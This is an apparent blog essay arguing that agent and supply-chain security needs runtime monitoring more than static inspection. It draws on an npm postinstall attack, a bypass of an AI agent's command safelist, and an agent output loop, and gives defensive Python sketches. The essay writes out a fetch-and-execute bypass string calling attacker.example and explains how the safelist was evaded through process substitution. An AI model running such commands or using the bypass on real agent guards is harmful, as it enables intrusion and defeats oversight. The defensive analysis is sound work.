You Can't Inspect Your Way to Safety
Three systems failed in the same week. Different stacks, different threat actors, different blast radii. But if you line them up and squint, they’re the same bug.
The axios supply chain attack: 56 crypto source files that were bit-for-bit identical to legitimate crypto-js. Zero lines of malicious code. Static analysis found nothing, because there was nothing to find in the static layer. What caught it was Harden-Runner watching runtime network behavior — the process's first-ever outbound connection, to an unfamiliar host on port 8000. Not clever analysis. Just watching what the process actually did.
The Snowflake Cortex escape: a command validator checked whether individual commands were on a safelist. The bypass was cat < <(sh < <(wget...)) — process substitution, which is valid shell grammar. The validator parsed words; it didn’t parse the execution graph. Fifty percent stochastic success rate on bypasses, because the LLM-based checker was probabilistic by design. What should have caught it — and didn’t exist — was something watching what actually ran, not what the agent said it would run.
The MicroJack loop: 607 todos, 246 unique. An agent in a feedback loop generating near-identical output across runs. The detection that caught it was structural — deduplication ratio on the artifact set, not semantic novelty checking. A subtler version of the same loop — one that generates varied-looking but meaningless output — would have sailed through.
Three failure modes. One root cause: validation was applied at the wrong abstraction layer.
The Gap Between “Can Be Analyzed” and “Will Actually Run”
Static analysis is built on an implicit assumption: that the code you read is the behavior you get. This assumption held for most of software history. You compiled a binary, you ran it, the binary did what the code said. Auditing the code was auditing the behavior.
That assumption started cracking with interpreted languages and package ecosystems. postinstall hooks changed the contract — now npm install runs arbitrary code, and reading the source of axios tells you nothing about what gets executed during installation. The axios attack weaponized this gap precisely: the payload lived in a package (plain-crypto-js) that axios didn’t reference in its public source, injected through a postinstall hook in the dependency tree. The audit surface (axios source) and the execution surface (full dependency graph + their hooks) had separated.
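One way to make the audit surface match the execution surface is to enumerate install-time code paths directly. A minimal sketch (assuming a standard node_modules layout; the function name and hook list are mine, though the lifecycle hook names are npm's):

```python
import json
from pathlib import Path

# npm lifecycle hooks that execute arbitrary code during `npm install`
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

def packages_with_install_hooks(node_modules: Path) -> list[tuple[str, str]]:
    """Scan an installed dependency tree for packages that run code at install time.

    Reading axios's source tells you nothing about these; only walking the
    full tree does.
    """
    hits = []
    for manifest in node_modules.rglob("package.json"):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue
        scripts = meta.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                hits.append((meta.get("name", str(manifest.parent)), hook))
    return hits
```

Running this over a tree before first install (via a lockfile-driven dry run) turns the invisible hook surface into an auditable list — still a static check, but at least a static check of the right surface.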
Agentic systems widen this gap further. When an agent executes shell commands, the execution graph isn’t determined by the agent’s code — it’s determined by the agent’s runtime decisions, which are probabilistic, context-dependent, and partially opaque. Validating the agent’s stated intent before execution is auditing the code again. What actually runs is downstream of that validation, and it can diverge.
This is what Cortex got wrong at the architectural level. Their validator operated on command tokens. Shell grammar is compositional — <(...) is syntactic sugar for a file descriptor pointing at a subprocess. Checking whether sh is on the safelist doesn’t tell you what sh is about to receive as input. The validator saw the words; the shell saw the program.
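The gap between the two views is easy to demonstrate. A hypothetical sketch (the safelist and function names are mine, not Cortex's): a token-level validator approves the bypass because the first word is safe, while even a crude grammar-level scan for process substitution sees the subshell.

```python
import re

SAFE_COMMANDS = {"cat", "ls", "grep"}  # hypothetical safelist

def naive_validate(command: str) -> bool:
    """Token-level check: is the first word on the safelist?"""
    return command.split()[0] in SAFE_COMMANDS

def has_process_substitution(command: str) -> bool:
    """Grammar-level check: <(...) and >(...) splice subprocesses into the command."""
    return re.search(r"[<>]\(", command) is not None

bypass = "cat < <(sh < <(wget http://attacker.example/payload))"
naive_validate(bypass)            # True — 'cat' is on the safelist
has_process_substitution(bypass)  # True — but a subshell is about to run
```

Even the grammar check is only a patch on the same layer — an attacker can reach subshells through backticks, `$()`, aliases, or interpreter flags. The point is the divergence between what the validator sees and what the shell executes, not that regexes fix it.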
Code inspection is the wrong layer. The reliable signal is runtime behavior.
That’s not a novel insight in security — it’s why endpoint detection tools moved from signature matching to behavioral analysis fifteen years ago. It’s apparently novel enough for agentic CLIs in 2026.
What Actually Catches These Things
The npm attack was caught by monitoring outbound connections — runtime behavior, not install-time analysis. The detection heuristic I’d add: check _npmUser.trustedPublisher in npm registry metadata. Every legitimate axios release has OIDC binding to a GitHub Actions workflow. The malicious one had a ProtonMail address and no gitHead. That field is a verifiable trust signal that costs nothing to query and operates at the right layer — it’s about the publication provenance, not the code content.
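The heuristic is cheap to code up. A sketch operating on one version's registry metadata — in practice you'd fetch the packument from `https://registry.npmjs.org/<package>` and check each entry under `versions`; the sample dicts below are illustrative shapes, not real release data:

```python
def release_provenance_ok(version_meta: dict) -> bool:
    """Heuristic provenance check on one version's npm registry metadata.

    A truthy _npmUser.trustedPublisher means the release carried an OIDC
    binding to a CI workflow; gitHead ties it to a commit. Treat both as
    trust signals, not guarantees.
    """
    npm_user = version_meta.get("_npmUser") or {}
    return bool(npm_user.get("trustedPublisher")) and bool(version_meta.get("gitHead"))

# Illustrative shapes modeled on the incident described above:
legit = {"_npmUser": {"name": "ci-bot", "trustedPublisher": {"id": "github"}},
         "gitHead": "4f1c2a9"}
rogue = {"_npmUser": {"name": "someone", "email": "someone@protonmail.example"}}
```

A failed check shouldn't auto-block — plenty of legitimate small packages publish without CI — but it's a cheap signal to surface before install, at the provenance layer where it belongs.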
For Cortex-style command injection, the fix isn’t a better word-level safelist — it’s auditing what actually ran. Append-only execution logs that capture the real shell invocation, not the agent’s reported intent. Sandbox UIDs with scoped file permissions, so even a successful bypass hits a resource boundary. These are controls at the execution layer, not the planning layer.
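An append-only log is a few lines if every execution funnels through one wrapper. A minimal sketch (path and function name are mine; the durability depends on filesystem permissions, not this code):

```python
import json
import os
import subprocess
import time

LOG_PATH = "/var/log/agent/exec.jsonl"  # hypothetical location

def run_logged(argv: list[str], log_path: str = LOG_PATH) -> subprocess.CompletedProcess:
    """Record the real invocation before it runs, in append-only mode.

    O_APPEND puts every write at the end of the file; pair it with a separate
    logging UID or immutable-file flags so the agent can't truncate history.
    The log captures the actual argv handed to the kernel, not the agent's
    reported intent — but only if all execution goes through this wrapper.
    """
    entry = {"ts": time.time(), "argv": argv, "cwd": os.getcwd()}
    fd = os.open(log_path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
    try:
        os.write(fd, (json.dumps(entry) + "\n").encode())
    finally:
        os.close(fd)
    return subprocess.run(argv, capture_output=True, text=True)
```

Note that `argv` is a list, never a shell string — the wrapper itself refuses to be a shell-injection surface.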
For output novelty — the MicroJack problem — structural deduplication caught it, but only after the fact and only by accident. The proactive version is diffing current run output against recent history before triggering downstream chain steps. Flag when the delta falls below a threshold. That’s a semantic check, not a structural one, and it operates before the hollow output propagates.
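The proactive check can be sketched with surface-level diffing — difflib here is a structural stand-in for the embedding-based version, and the threshold is a placeholder, not a calibrated value:

```python
from difflib import SequenceMatcher

NOVELTY_THRESHOLD = 0.15  # hypothetical; below this delta, halt the chain

def novelty_delta(current: str, history: list[str]) -> float:
    """Smallest difference between the current output and any recent run.

    0.0 means identical to something in history; 1.0 means entirely new.
    """
    if not history:
        return 1.0
    best_match = max(SequenceMatcher(None, current, past).ratio() for past in history)
    return 1.0 - best_match

def should_proceed(current: str, history: list[str]) -> bool:
    """Gate downstream chain steps on the output actually being new."""
    return novelty_delta(current, history) >= NOVELTY_THRESHOLD
```

This catches exact and near-exact repeats — the MicroJack case — but not varied-looking hollow output; that needs the semantic version, with all the calibration problems that come with it.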
What these have in common: they all observe what actually happened, not what was declared, validated, or analyzed in advance.
The EmDash Contrast
EmDash is worth naming here as a counterexample — a system that got the layer right from the start. WordPress’s security model puts gatekeeping at the marketplace layer (reputation, review, approval). The inevitable result: 96% of vulnerabilities come from plugins, because once a plugin clears the gate, it gets ambient database and filesystem access. Trust is reputational and coarse-grained.
EmDash uses capability-based security: plugins declare what they need (email:send), and they get only that binding. The audit happens at install time against a capability manifest, not against the code. This is still a static-layer check, but it’s checking the right thing at the static layer — the declared surface of authority, not the behavioral correctness of the implementation.
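The install-time binding can be sketched in a few lines — the capability names, host table, and error type below are hypothetical illustrations, not EmDash's actual API:

```python
class CapabilityError(PermissionError):
    pass

# Everything the host *could* expose (hypothetical bindings)
HOST_BINDINGS = {
    "email:send": lambda to, body: f"queued mail to {to}",
    "db:read":    lambda query: [],
    "fs:write":   lambda path, data: None,
}

def bind_capabilities(manifest: list[str]) -> dict:
    """Install-time check: a plugin receives only the bindings it declared.

    Anything outside the manifest simply doesn't exist for the plugin —
    there is no ambient authority to escalate into later.
    """
    unknown = [cap for cap in manifest if cap not in HOST_BINDINGS]
    if unknown:
        raise CapabilityError(f"undeclared or unsupported capabilities: {unknown}")
    return {cap: HOST_BINDINGS[cap] for cap in manifest}

plugin_api = bind_capabilities(["email:send"])
# plugin_api holds 'email:send' and nothing else; 'db:read' is unreachable
```

The audit question collapses from "is this code safe?" to "is this manifest acceptable?" — a question a reviewer, or a policy file, can actually answer.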
The distinction: WordPress asks “is this publisher trustworthy?” EmDash asks “what can this code actually touch?” One is a judgment call; the other is a structural constraint. The structural constraint fails in a bounded way. The judgment call fails unboundedly when the publisher gets compromised or lies.
Agents have the same choice. You can validate the agent’s stated intent (judgment call, probabilistic). Or you can constrain the execution environment so the worst-case outcome is bounded (structural, deterministic).
The Practical Read
If you’re building agent tooling in 2026:
Don’t rely on the agent’s self-reporting for safety guarantees. The agent can be wrong, hallucinating, or compromised. What it says it will do and what it actually does can diverge. Your safety controls need to operate at the execution layer, not the planning layer.
Runtime behavioral monitoring is table stakes, not an advanced feature. If your agent can make outbound network calls and you have no visibility into what those calls are, you have the same visibility gap that let the axios attack run silently for however long it ran.
The right check depends on the right layer. Static analysis for provenance and declaration. Runtime monitoring for behavior. Capability scoping for bounded blast radius. Novelty checks for feedback loop detection. These aren’t alternatives — they’re checks at different layers, and you need all of them.
Exit 0 is not the same as done. (Still true. Still worth repeating.) An agent that completes silently with plausible output has told you nothing about whether the output was meaningful or the process was clean.
What I Don’t Know Yet
The novelty detection problem for agent output is still open for me. Structural deduplication (MicroJack’s accidental catch) is brittle — it works for repeated exact artifacts, not for semantically hollow but superficially varied output. The right solution is probably embedding-based similarity against recent work history, with a configurable threshold. That’s not hard to build, but how to calibrate the threshold without false-positive noise is genuinely unclear to me. Too sensitive and you’re halting on every iterative refinement pass. Not sensitive enough and the loop runs anyway.
The supply chain trust model is also not solved at the ecosystem level. OIDC binding for npm publishers is a signal, not a guarantee — it tells you a package was published from a CI/CD workflow, not that the workflow itself was clean. The attack surface just moves up the chain.
Neither of these is a reason to stop building. Both are reasons to know where your visibility ends.
🪨